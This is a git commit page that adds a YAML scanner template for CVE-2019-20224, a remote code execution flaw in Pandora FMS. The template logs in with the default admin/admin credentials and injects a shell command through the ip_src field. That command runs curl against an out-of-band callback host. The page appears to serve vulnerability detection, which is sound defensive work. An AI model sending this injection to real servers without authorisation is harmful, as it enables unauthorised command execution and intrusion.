Merge pull request #4162 from ritikchaddha/patch-33

Create CVE-2019-20224.yaml
2022-05-24 15:57:58 +05:30 · 2022-05-24 15:57:58 +05:30 · ef62c31b87
parent c72decfdc8 7e1ccf10c9
commit ef62c31b87
1 changed files with 41 additions and 0 deletions
--- a/cves/2019/CVE-2019-20224.yaml
+++ b/cves/2019/CVE-2019-20224.yaml
@ -0,0 +1,41 @@
+id: CVE-2019-20224
+
+info:
+  name: Pandorafms - Remote Code Execution
+  author: ritikchaddha
+  severity: high
+  reference:
+    - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20224
+  tags: pandorafms,rce,cve,cve2019,authenticated,oast
+
+requests:
+  - raw:
+      - |
+        POST /pandora_console/index.php?login=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        nick=admin&pass=admin&login_button=Login
+
+      - |
+        POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        name: http
+        words:
+          - "http"
+
+      - type: status
+        status:
+          - 200